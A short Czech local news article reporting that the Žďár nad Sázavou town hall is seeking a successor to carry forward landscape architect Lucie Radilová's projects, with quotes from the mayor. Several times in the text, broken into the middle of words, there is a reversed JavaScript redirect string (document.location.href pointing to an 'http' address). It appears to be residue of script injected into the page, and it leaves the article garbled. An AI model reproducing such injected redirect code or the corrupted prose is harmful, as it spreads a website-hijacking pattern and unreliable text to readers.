Rainbow page separator

Projekty krajinářky dovede k realizaci nový pracovník

Neděle, 2. ledna 2022

Žďár nad Sázavou / Po novém pracovníkovi za městskou krajinářku Lucii Radilovou, která se v minulých letech podílela na řadě projektů a nyní se rozhodla věnovat dalším pracovním příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostem, se bude poohlížet žďárská radnice. „Odvedla pro nás fantastický výkon a my bychom na její práci chtěli navázat tím, že najdeme někoho z oboru, ne architekta-krajináře, ale spíše projektanta nebo jiného člověka z terénu, který připravené projekty dokáže dovést k realizaci,“ uvedl žďárský starosta Martin Mrkos. Příkladem, jak by ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to spolupráce měla fungovat, může být třeba upřesnění vhodné skladby dřevin a dalších detailů u pásů zeleně, které opticky oddělí frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované silnice od zástavby a současně ji ochrání před hlukem či prachem. „V takovém případě bychom od projektanta očekávali návrh na doladění skladby stromů či keřů s respek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továním základů krajinařiny i skutečnosti, že se nacházíme na Vysočině. Zatím ještě není jasná přesná forma spolupráce, spíše ale bude externí na jednotlivých projektech,“ doplnil starosta.